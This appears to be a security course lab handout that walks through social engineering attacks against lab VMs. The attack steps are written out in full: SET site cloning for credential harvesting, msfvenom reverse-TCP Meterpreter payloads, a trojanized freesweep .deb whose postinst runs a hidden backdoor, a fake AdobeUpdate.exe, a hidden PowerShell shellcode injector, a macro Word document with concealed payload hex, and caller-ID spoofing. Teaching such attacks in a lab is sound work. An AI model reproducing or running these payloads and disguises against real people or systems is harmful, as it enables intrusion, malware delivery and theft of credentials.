In this lab you are going to perform social engineering activities using the Social-Engineer Toolkit (SET).

"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." -

Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly.  Are they believable?  Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.

So, with the understanding that SET is more for "fun demos", let's go!


Part 1 - Credential Harvesting via Site Cloner

Run the Social-Engineer Toolkit

$ sudo setoolkit 
XX                                                                          XX
XX   MMMMMMMMMMMMMMMMss'''                          '''ssMMMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMyy''                                    ''yyMMMMMMMMMMMM   XX
XX   MMMMMMMMyy''                                            ''yyMMMMMMMM   XX
XX   MMMMMy''                                                    ''yMMMMM   XX
XX   MMMy'                                                          'yMMM   XX
XX   Mh'                                                              'hM   XX
XX   -                                                                  -   XX
XX                                                                          XX
XX   ::                                                                ::   XX
XX   MMhh.        ..hhhhhh..                      ..hhhhhh..        .hhMM   XX
XX   MMMMMh   ..hhMMMMMMMMMMhh.                .hhMMMMMMMMMMhh..   hMMMMM   XX
XX   ---MMM .hMMMMdd:::dMMMMMMMhh..        ..hhMMMMMMMd:::ddMMMMh. MMM---   XX
XX   MMMMMM MMmm''      'mmMMMMMMMMyy.  .yyMMMMMMMMmm'      ''mmMM MMMMMM   XX
XX   ---mMM ''             'mmMMMMMMMM  MMMMMMMMmm'             '' MMm---   XX
XX   yyyym'    .              'mMMMMm'  'mMMMMm'              .    'myyyy   XX
XX   mm''    .y'     ..yyyyy..  ''''      ''''  ..yyyyy..     'y.    ''mm   XX
XX           MN    .sMMMMMMMMMss.   .    .   .ssMMMMMMMMMs.    NM           XX
XX           N`    MMMMMMMMMMMMMN   M    M   NMMMMMMMMMMMMM    `N           XX
XX            +  .sMNNNNNMMMMMN+   `N    N`   +NMMMMMNNNNNMs.  +            XX
XX              o+++     ++++Mo    M      M    oM++++     +++o              XX
XX                                oo      oo                                XX
XX           oM                 oo          oo                 Mo           XX
XX         oMMo                M              M                oMMo         XX
XX       +MMMM                 s              s                 MMMM+       XX
XX      +MMMMM+            +++NNNN+        +NNNN+++            +MMMMM+      XX
XX   MMMMd   ''''hhhhh       odddo          obbbo        hhhh''''   dMMMM   XX
XX   MMMMMd             'hMMMMMMMMMMddddddMMMMMMMMMMh'             dMMMMM   XX
XX   MMMMMMd              'hMMMMMMMMMMMMMMMMMMMMMMh'              dMMMMMM   XX
XX   MMMMMMM-               ''ddMMMMMMMMMMMMMMdd''               -MMMMMMM   XX
XX   MMMMMMMM                   '::dddddddd::'                   MMMMMMMM   XX
XX   MMMMMMMM-                                                  -MMMMMMMM   XX
XX   MMMMMMMMM                                                  MMMMMMMMM   XX
XX   MMMMMMMMMy                                                yMMMMMMMMM   XX
XX   MMMMMMMMMMy.                                            .yMMMMMMMMMM   XX
XX   MMMMMMMMMMMMy.                                        .yMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMy.                                    .yMMMMMMMMMMMMMM   XX
XX   MMMMMMMMMMMMMMMMs.                                .sMMMMMMMMMMMMMMMM   XX
XX                                                                          XX
    .o88o.                               o8o                .
    888 `"                               `"'              .o8
   o888oo   .oooo.o  .ooooo.   .ooooo.  oooo   .ooooo.  .o888oo oooo    ooo
    888    d88(  "8 d88' `88b d88' `"Y8 `888  d88' `88b   888    `88.  .8'
    888    `"Y88b.  888   888 888        888  888ooo888   888     `88..8'
    888    o.  )88b 888   888 888   .o8  888  888    .o   888 .    `888'
   o888o   8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P'   "888"      d8'

[---]        The Social-Engineer Toolkit (SET)         [---]                                                               
[---]        Created by: David Kennedy (ReL1K)         [---]                                                               
                      Version: 8.0.3                                                                                       
                    Codename: 'Maverick'                                                                                   
[---]        Follow us on Twitter: @TrustedSec         [---]                                                               
[---]        Follow me on Twitter: @HackingDave        [---]                                                               
[---]       Homepage:       [---]                                                               
        Welcome to the Social-Engineer Toolkit (SET).                                                                      
         The one stop shop for all of your SE needs.                                                                       

   The Social-Engineer Toolkit is a product of TrustedSec.                                                                 


   It's easy to update using the PenTesters Framework! (PTF)
Visit to update all your tools!                                                          

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit


Select the desired mode of operation:

set> 1   # For "Social-Engineering Attacks"
set> 2   # For "Website Attack Vectors"
set:webattack> 3   # For "Credential Harvester Attack"
set:webattack> 2   # For "Site Cloner"

The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.

set:webattack> aaa.bbb.ccc.ddd

Enter the website that you wish to clone


Launch the web browser in Kali and visit your cloned page at http://aaa.bbb.ccc.ddd

Enter a fake username and password, and confirm that you see those credentials in the SET console.

Note that the cloned website redirects to the real Canvas login page after swiping the credentials.

The user just assumes they entered the wrong login, tries again, and is in Canvas. Will they be suspicious?  How many times have you entered a wrong password?


  • Upload the XML report that SET produces with all the stolen credentials.  You'll need to stop the collection process via CTRL-C.

While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.


  • Issue 1: Look at the URL of your cloned site: http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet?  Try accessing it from your phone if you're unsure. Why doesn't it work?  (See: Background reading)
  • Issue 1 (continued): How might you solve the IP address issue in the previous question?
  • Issue 2: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd.  An ugly IP address.  Even 25% of moms would notice that looks suspicious or unusual.  How could you remedy this problem?
  • Issue 3: Look at the URL of your cloned site again: http://aaa.bbb.ccc.ddd.  HTTP.  That's not encrypted.  Web browsers are increasingly assertive with labeling such pages as not secure with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem?  (And, even better, solve this problem for a cost of $0.00?)

Part 2 - Email Blast

Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions).  How do we get victims (er, client employees who we have explicit written permission to test) to visit our site?   Let's send them an email and bait them to click it.

The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design.  Actually using this module (or any other mass mailing program) effectively, however, is a challenge.   What you would love to do is generate fake emails coming from or, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.

One such anti-spam technology is Sender Policy Framework (SPF).


  • Describe SPF, in your own words.  (1 paragraph)
  • Using any number of available websites, generate a SPF rule for the domain, specifying that IP address is allowed to send email for this domain, and also that host is also allowed to send email for this domain.  Note: There are other more-detailed SPF options. I don't care how you set them.
As an example, the SPF rule for is v=spf1 ip4: ip4: ip4: ....(more hosts).... ~all

Another such anti-spam technology is DomainKeys Identified Mail (DKIM).


  • Describe DKIM, in your own words.  (1 paragraph)

Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.


  • Describe DMARC, in your own words.  (1 paragraph)

Note that none of these systems are guarantees.  The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox.  Even new legitimate senders have significant challenges in reliably delivering emails to,, and other large mail services.

Because of these challenges, you'll often see phishing attacks coming from, or, or, as those are more likely to be delivered. Of course, if you have already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - often times you're using social engineering attacks to gain initial access to the network.


  • Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action.  Send it to yourself to ensure it's correctly formatted.  Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.

Part 3 - Payloads via msfvenom

Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.

To see a list of all available payloads, do:

$ msfvenom --list payloads

It's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit.  Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.

To see a list of available output formats, CPU architectures, and platforms, do:

$ msfvenom --list formats
$ msfvenom --list archs
$ msfvenom --list platforms

Make an executable that is runnable on our Metasploitable2 VM, a Linux host.  That would be the .elf file type. (Windows would be .exe).  Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to /tmp/LegitProgram. This payload is hardwired to connect back to the LHOST IP address, which should be Kali's IP:

$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
> /tmp/LegitProgram

Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character \.    Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly redirect the output (using >) to the file /tmp/LegitProgram, and thus msfvenom output the executable file to standard output instead.

Change to the /tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary.  We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.

$ cd /tmp 
$ python2 -m SimpleHTTPServer 8888    # Built-in webserver in Python 2
#  python3 -m http.server 8888        # Alternate command: Built-in webserver in Python 3

Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:

$ wget aaa.bbb.ccc.dddd:8888/LegitProgram

Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitiProgram.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.

At this point, you can CTRL-C on the webserver, we don't need it any more.

Run metasploit

$ sudo service postgresql start
$ msfconsole

Use the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know

  • What payload is incoming
  • What IP the payload is connecting to, and
  • What port the payload is connecting to.
msf6>  use exploit/multi/handler
msf6>  set PAYLOAD linux/x86/meterpreter_reverse_tcp
msf6>  set LHOST aaa.bbb.ccc.ddd
msf6>  set LPORT 5678
msf6>  set ExitOnSession false

Run this service in the background as a job.

msf6> exploit -j

Now, over in the Metasploitable2 VM, run the payload.

$ chmod +x LegitProgram     # Needs to be marked as executable
$ ./LegitProgram

Back in Kali, you should see a notice that a new session was opened.

[*] Meterpreter session 1 opened ( -> at 2021-02-07 00:20:41 -0800
msf6> sessions --list
msf6> sessions -i X   # where X = number of Meterpreter session


  • Submit a screenshot of your Kali msfconsole showing an active meterpreter session
  • Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
  • Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.

In Kali, you can quit the Meterpreter session with the quit command.  In addition, you can view the listening handler with jobs and then kill that listener with kill # (where # is the job ID number)

Part 4 - Payload Obfuscation

Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program?   Let's build an Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.

Based off of this tutorial, but with bugfixes.  :)

First, on Kali, download the legitimate .deb file from the package manager.  Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.

$ mkdir -p /tmp/working
$ cd /tmp/working
$ wget

Second, extract the files into that working directory

$ dpkg -x freesweep_0.88-4.3_i386.deb package

Third, add a DEBIAN directory to contain the "extra surprise" we are included in this package

$ mkdir /tmp/working/package/DEBIAN

In the DEBIAN directory, create a new file called control with the following contents:

$ nano /tmp/working/package/DEBIAN/control
Package: freesweep
Version: 0.88-4.3
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.

In the DEBIAN directory, create a post-installation script called postinst with the following commands that

  • Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
  • Run the innocently-named "freesweep_scores", and
  • Run the legitimate freesweep program
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep

Make this script executable

$ chmod +x /tmp/working/package/DEBIAN/postinst

Now, generate our backdoor program "freesweep_scores":

$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
--out /tmp/working/package/usr/games/freesweep_scores

Finally, build the new .deb file with the backdoor program:

$ cd /tmp/working/package/DEBIAN
$ dpkg-deb -Zgzip --build /tmp/working/package
# -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and
# package manager doesn't know how to uncompress newer .deb files

Rename the output back into the original freesweep.deb file name (no one suspects a thing!), and move it to /tmp

$ mv /tmp/working/package.deb /tmp/freesweep.deb
$ cd /tmp

As you did in the previous section: Run the web server and copy the new freesweep.deb to your Metasploitable2 VM with wget.

Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc, as shown in the wget output.  Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.

As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection.  Or, if msfconsole is still active, the hander may be still running.

On the Metasploitable2 VM, install this super fun game your friend sent you!

$ sudo dpkg -i freesweep.deb
# Oh look, the game started automatically! 
# Let's play, this looks fun! 

On Kali, view the active sessions

msf6> sessions --list
msf6> sessions -i  x
meterpreter> sysinfo


Did something go wrong in your steps?  To clear out metasploitable2 and start again:

$ sudo apt-get remove freesweep
$ rm freesweep.deb
# And download a fixed .deb file and try installing it again

You can verify that your copy of freesweep.deb contains your backdoor program with dpkg -c freesweep.deb.


  • Submit a screenshot of Metasploitable2 showing the game running
  • Submit a screenshot of Kali showing the active meterpreter session
  • What is the md5 checksum of the original freesweep .deb file downloaded from the repository?  Use the md5sum command
  • What is the md5 checksum of the modified freesweep.deb file that also includes the backdoor program "freesweep_scores"?   Use the md5sum command

Extra Fun

Part 1. MSFVenom with fake AdobeUpdate.exe

In this section, you’ll use msfvenom to perform a client-side attack. Your goal is to:

  1. Create a malicious executable file containing a payload
  2. Host it on a web server disguised as an Adobe Update file.

Following this, you will play the role of the victim using the Windows VM. You will:

  1. Download the malicious file
  2. Run the file, leading to the Windows VM being exploited.

To start, log in to Kali, and start up the Windows virtual machine.

Play the attacker

  1. In Kali, type msfvenom --list formats to see a list of output formats that msfvenom supports. Examine the “Framework Executable Formats” section. We’ll use exe option (via -f exe) option to create a Windows executable.

In Kali, run the following command, all on one line:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=virbr1 -f exe > /tmp/AdobeUpdate.exe


  • -p – selects the payload to be the same one we used during the exploitation lab – meterpreter.
  • -f exe – selects the file type of the output executable
  • LHOST=virbr1 – sets LHOST to be the name of the adapter on which Kali has its address. msfconsole should translate it for us.

> /tmp/AdobeUpdate.exe – redirects the output from running the msfvenom command into a file called AdobeUpdate.exe, stored in the /tmp directory.This is not actually an Adobe Update! This is our payload, disguised.

  1. Verify that the output file is about 73802 bytes in size. If not, you may need to check that you entered the command correctly and run it again.
  2. Run an msf handler to listen for the meterpreter reverse connection which will be incoming when our malicious AdobeUpdate.exe payload file is executed.
  3. On Kali, open a new terminal window and enter msfconsole.

Enter use exploit/multi/handler.

Once you’ve switched to this exploit module, type show info. Note that this module “is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.” A stub adds additional functionality to other exploits.

  1. Enter set PAYLOAD windows/meterpreter/reverse_tcp.
  2. Enter set LHOST virbr1.

Enter exploit -j.The -j option jobifies the exploit, or runs it as a job in the background. You can see a list of jobs running in the background by using the command jobs.Because ExitOnSession is set to True (the default for exploit/multi/handler; verify with show advanced from msfconsole), your handler will die after it gets one connection.

The handler is now listening.

Now, we need to set up a way to deliver the payload to the victim. We will set up a web server to host your malicious file.

From a terminal on Kali, change directories to /tmp:

cd /tmp
  1. Use ls to check that the payload you generated earlier is in this directory.

Now, from that directory, run the following command to use an http webserver built into python to serve content from the current directory (/tmp) on an arbitrary port - 8888:

python3 -m http.server 8888

Note: when you run this command, it will appear that nothing happens. Actually, the web server is running, and it will log output to the terminal if it receives any web requests. You can verify this by visiting http://localhost:8888 in a web browser on Kali and observing the output logged to the terminal.

Play the victim

Now, switch to playing the role of the victim. On your Windows VM, using the Internet Explorer web browser (Not Chrome!), navigate to Click AdobeUpdate.exe to download it. Click it to execute it. On the “Windows protected your PC” security dialog that appears, click “More info” and then “Run anyway.”

adobe update execute more info

Play the attacker again

On your Kali VM, you should see in your msfconsole that “Command shell session X opened,” where X is the number of the new session. Congratulations!


sessions -i [the number of the new session]

This should open a connection to a meterpreter on the Windows VM.

  1. Run shell to drop down into a windows cmd prompt
  2. Type whoami to see the privileges that you are running under. Note that these are the privileges of the user of your Windows VM.
  3. Run the command netstat -n to see a listing of open connections on the Windows server. Note the “ESTABLISHED” connection from the Windows VM to your Kali VM.
  4. Return to your meterpreter shell by running exit to leave the cmd prompt.
  5. Carry out any nefarious purpose you have in mind for the victim – yourself


Take a screenshot showing the output of running the following commands from your meterpreter session:

pgrep AdobeUpdate
echo "your first and last name"
date /t

The first command should show the process id related to your trojan pdf, and the second verifies that you are tied to that process. This establishes that you were successful in this exploit.

pgrep AdobeUpdate searches through the output of ps, looking for any line that text-matches the argument AdobeUpdate, and returns the process id. If you were to visually inspect the output of ps, you would notice that the full process filename includes a .exe extension. But the example above does not include .exe in the search term. This is because it is possible that you downloaded the payload file multiple times, which would lead Windows to renaming the subsequent downloads incrementally, e.g., AdobeUpdate (3).exe for the fourth download. Searching for just AdobeUpdate will locate the process regardless of how many times the file was downloaded, assuming that the filename was spelled correctly.

The shell command drops you into a windows shell where you can more easily establish your identity.

Once you have completed these steps, you can close your meterpreter session, but you may wish to leave your /tmp http.server running for later lab parts.

Part 2. Social Engineering Toolkit (SET) – Site Cloner

In this section, you’ll use the Social Engineering Toolkit (SET) to craft social engineering attacks.

In a Kali shell, navigate to the /opt/setoolkit directory and run the command ./setoolkit (don’t forget the ./). Agree to the terms of service. You should see a screen like the following:


Enter option 1 for social-engineering attacks. That should display this menu:


Select option 2 for website attack vectors. The next menu will list the various web attack vectors:


Select number 3 for a credential harvesting attack. This brings you to the following screen:


Select option 2 to clone a target website. This is a very sophisticated feature that can clone almost any website.

After you’ve selected this feature, you’ll need to set an IP address to host the cloned site. Set “IP address for the POST back in Harvester/Tabnabbing” to, the IP address of Kali Linux for the host-only network. If SET already displays the correct IP address in brackets (e.g., “[]”), just push enter.

Now you get to choose the website to clone. However, not all websites’ login processes can be automatically cloned. Two login pages that were verified to work as of October 2021 are and Set either of these as the address to clone.

Note: Be sure you enter “https” in the URL.

If all has gone well, you should see a screen like the following:

set site cloner

Now it’s time to script the phishing message to send. At this point, an attacker would use a tool or service to send a spoofed email. For simplicity, skip this step and instead send an email to your own email account with the message:

“You are receiving this email because there is a problem with your account. Please go to and login to verify your account.”

Use rich text formatting to make a hyperlink that points to the IP of your Kali VM:

Open the email in your Windows VM. When you receive the email, click the link.Alternatively, simply imagine that you sent yourself the above email, and visit from a browser within the Windows VM.

You should be looking at whatever the current login page looks like – a cloned copy!

facebook login

Note: the address bar indicates the actual IP of the attacker. This is the biggest indication that the site is forged. If this were a more sophisticated attempt, the attacker would obtain a domain that looked similar to Twitter (like To easily obtain a phishing url, an attacker could use a site like

Enter fake credentials into the fields on the spoofed website, and click the login button on the website. On your Kali VM, you should see something similar to this in your terminal window:


Note: You may need to scroll up in your terminal window to find your username and password. Some of the “possible username field found” messages may be false positives. Just scroll up until you see your username and password.


Take a screenshot of setoolkit reporting the capture of credentials you enter onto whatever site you spoofed. The screengrab should show:

  • POSSIBLE USERNAME FIELD FOUND: <your first and last name>
  • POSSIBLE PASSWORD FIELD FOUND: <the password you entered>

Convenience Tip! The pattern from Part 1 of (1) generate a payload and (2) set up a handler to listen for a callback is common enough that SET gives you a higher-level interface for doing the same thing. For instance, the AdobeUpdate.exe steps in the earlier task could have been replaced with the following in setoolkit:

From the SET main menu:

  • Choose 1) Spear-Phishing Attack Vectors
  • Choose 4) Create a Payload and Listener
  • Choose 2) Windows Reverse_TCP Meterpreter
  • choose a LHOST and free PORT…
  • allow SET to set up a listener for you (yes)

Part 3. Social Engineering Toolkit (SET) – PowerShell Shellcode Injector

PowerShell is a powerful scripting language built into the Windows operating system. In this section, you will generate an encoded PowerShell script and execute it on Windows which opens a Meterpreter session on attacker’s machine.

  1. Launch setoolkit. If it was already launched, close it and then launch it anew.
  2. From the main menu, choose 1 for Social-Engineering Attacks.
  3. Then, choose 9 for PowerShell Attack Vectors.
  4. Within this submenu, select 1 for PowerShell Alphanumeric Shellcode Injector.
  5. Enter your Kali VM IP address and accept the default of port 443. Choose yes to start the listener. This will automatically open msfconsole and run some commands for you to set up a listener like you did manually in Part 1.
  6. Open another terminal and navigate to /root/.set/reports/powershell/

From that directory, open the script using the leafpad command:

 leafpad x86_powershell_injection.txt

Examine the script. It is powershell -W 1 -C "a-command-to-run".

  • -W 1 sets powershell to hide the shell when the command is invoked (to run hidden in the background).

-C "a-command" is a command to run via the powershell program.

In this case, the command includes a base64-encoded script that will attempt to open a meterpreter connection back to

  1. Copy the entire script you found on leafpad to the clipboard.
powershell save payload

On Windows, open a powershell session:

  • Either search for powershell and run “Windows Powershell”,
windows run powershell
  • Or search for and run cmd, and then run the powershell command within there.It is important that you open a "powershell" session and not a regular "cmd" one, because this command is longer than the maximum length allowed by "cmd", and would be truncated. But "powershell" does not have the same character limit.

You will know when you have a powershell session when your prompt begins with “PS”, like the following:

PS C:\Users\Labuser>

Then, paste the script on the windows command line. To do this, right-click once into the powershell session window (and be patient!). Then press enter to run the command.

The command prompt should disappear – this is part of the payload script.

Shortly after, you should see an opened Meterpreter session. Congratulations! Get the session id with sessions if you don’t already see it, and then interact with that session with sessions [id]

Optional: you can save the entire script as a windows batch file (.bat), then trick the user to run that file.

Consider: What ways might you trick a user into running this script?


Take a screenshot showing the output of running the following commands from your meterpreter session:

pgrep powershell
echo "your first and last name"
date /t

Part 4. Create a Malicious Microsoft Word Document

In this section, you will create a macro-enabled Microsoft Word file that opens a Meterpreter session on an attacker’s machine. Note that this exploits a feature of Word – not an inherent security vulnerability per se. Microsoft explains macros in Word as follows:

In Word, you can automate frequently used tasks by creating and running macros. A macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically.

Because Word docs can run macros, this attack vector will work as long as you can convince a user to open the Word file and enable some settings.

The first step is to create the malicious macro-embedded Word document, acting as the attacker. You will need access to Microsoft Word in order to do this. This part of the lab includes instructions for installing an evaluation version of Microsoft Word into the Windows virtual machine on Kali.

It is admittedly a bit odd to be, acting as an attacker, using the victim’s machine to create a malicious document that we want the victim to run on that very machine, but so be it.

Know that if you tried to use Word on a system running antivirus protection, it would likely prevent you from creating the malicious document, because it would detect that the document contained commands to launch a hidden shell (meterpreter). Rather than disable security settings on a system you rely on, use the lab’s windows virtual machine for the document-creation portion of this lab.

In Kali, run the following command (all one line):

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=virbr1 LPORT=7777 -e x86/shikata_ga_nai -f vba-exe > word-macro-exploit

This will save the exploit to a file called word-macro-exploit

Open word-macro-exploit using leafpad, and read the beginning of the output. It explains that the output is divided into two sections: A “Macro” section and a “Payload” section.

We will need to put the “Macro” section into a VBA module attached to a Word document, and the “Payload” section into the body text of the Word document.

The “Payload” is byte-code that the macro will read and write out into a file on the victim machine, after which it will execute the newly-created executable.

In Kali, use msfconsole to spin up a listener that will wait for a connection from our Word meterpreter payload:

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set LPORT 7777
 set LHOST virbr1
 set ExitOnSession false
 exploit -j

Install Word into the Windows virtual machine.

The version of Word that gets installed on the lab virtual machine only works for 5 days without a product key. The first time that you install windows to your virtual machine, you can run the following from kali as root:

cd /root/vagrant-boxes/lab-windows-2019-vuln/
git pull
vagrant up
vagrant provision --provision-with install-word

The installation process takes about two minutes.

  1. If your Word install expires

If your Word activation grade period expires, you can get a fresh start by running the full vagrant destroy-up-provision cycle again, via running the following from a terminal as `root`

cd /root/vagrant-boxes/lab-windows-2019-vuln
vagrant destroy
vagrant up
vagrant provision --provision-with install-word
vagrant provision --provision-with reboot

When the script finishes, open Word on Windows. Navigate through the welcome prompts.

  • On the screen Sign in to set up Office, click the x in the upper-right corner.
  • On the privacy page, click “Next”
  • On the next page, select “Don’t send optional data”
  • On the next page, click “Done”.

Open a new blank document:

word open blank document

“Save” the word document as a macro-enabled document (.docm):

word save as

Enable the Developer tool access button on the Word ribbon:

  • From Word’s File tab, select Options.
  • Then, select “Customize Ribbon” from the left-hand side menu
  • Check the Developer checkbox (see screenshot below).

From the Developer ribbon, select “Visual Basic” to open the Visual Basic editor.

word ribbon developer visual basic

Inside the visual basic editor, right-click the document, select Insert > Module.

word vba insert module

Copy all of the code from the “Macro” section of your word-macro-exploit file on Kali, and paste it into your new VBA module:

word macro exploit copy macro

Important for getting credit! About 33 lines into the VBA code, you will see a line with a variable assignment some random gibberish that ends in .exe. You will need to know the random gibberish later for the deliverable for this question. Example:

word macro exploit example exe
  1. “Save” the VB Module. Close the VB editor.

Next, in the main body of the Word document, paste the payload hex code from the kali output textfile. Save the document again.

word macro exploit copy payload

At this point, the payload is fully functional. However, a good social engineer would disguise the document, to allay suspicion. The following ideas are subjective artistry.

  • Above the hex code, type a simple memo as the ostensible content of the memo.
  • Highlight the hex code you pasted in and change the font size to “1” and the font color to white.
  • Rename the file to something like “Sales Memo.”This will make the hex code difficult to find for anyone who opens the document.

Next, test your malicious Word file.

  1. Close the document. Then, open it again.
  2. If Word asks, enable macro content (look for a yellow bar on the top of the Word document window).
word macro exploit enable content

In the Kali VM, you should now see that a Meterpreter session has been opened to the host workstation. Press the enter/return key to get a new line of msfconsole input.

If it doesn’t work, make sure that macros are enabled in your Word doc (Developer tab > Macro Security > Enable all macros).

From msfconsole, type sessions -l and verify that you have an active connection with the Windows VM IP address ( Assuming your desired session id is 1, type sessions -i 1 to interact with the session, where 1 is the ID of the session. You should now have an active meterpreter session on the Windows VM.

Optional: Use the sendEmail command on Kali to send a spoofed email with the malicious Word file as an attachment. To see how the sendEmail command works, type man sendEmail.


In your meterpreter session on the Windows VM, take a screenshot showing the output of running the following commands:

ps -S <first-few-letters-of-your-gibberish-exe-filename>
echo "your first and last name"
date /t

This will establish that your random gibberish.exe is running, and that your meterpreter process is tied to that process.

See the example below:

word macro exploit deliverable

Part 5. Spoof your phone number

In this section, you’ll use the app SpoofCard to spoof your phone number when making a call. This is a common technique used by social engineers to lend credibility to their calls when vishing. According to

Caller ID has become a common place technology in both business and home use. Especially with the advance of cell phones replacing many of the phone lines people use, caller ID is part of our daily life. Being aware of this fact and how to use this to your advantage is a must for a successful social engineer.
The basic principal behind caller ID spoofing is to change the information that is displayed on the caller ID display. A few of the points discussed in this framework under authority state that we can use the idea of authority and/or commitment to influence a person. An even stronger presence is the use of credibility. Building credibility can make or break a successful social engineer attack.
  1. Download the SpoofCard app from the Apple App Store or Google Play Store.
  2. Open the app and press Get Free credits.
  3. Enter your true phone number and email address. Select a 4-6 digit pin. Check the terms of service box, and press Sign up.
  4. Enter the number of a friend you would like to call in the field Number to call.
  5. Enter the number of a mutual friend that you would like to spoof in the field Caller ID to Display.
  6. If you want, select the Voice Changer button to change your voice. Optionally, select the background noise option and select a background noise.
  7. Select Call. The app will show an intermediary SpoofCard phone number to call. Tap to call that number so that the SpoofCard service will call your friend.
  8. For a moment, pretend to be your mutual friend before explaining that you spoofed the call.

See for more information about this type of attack.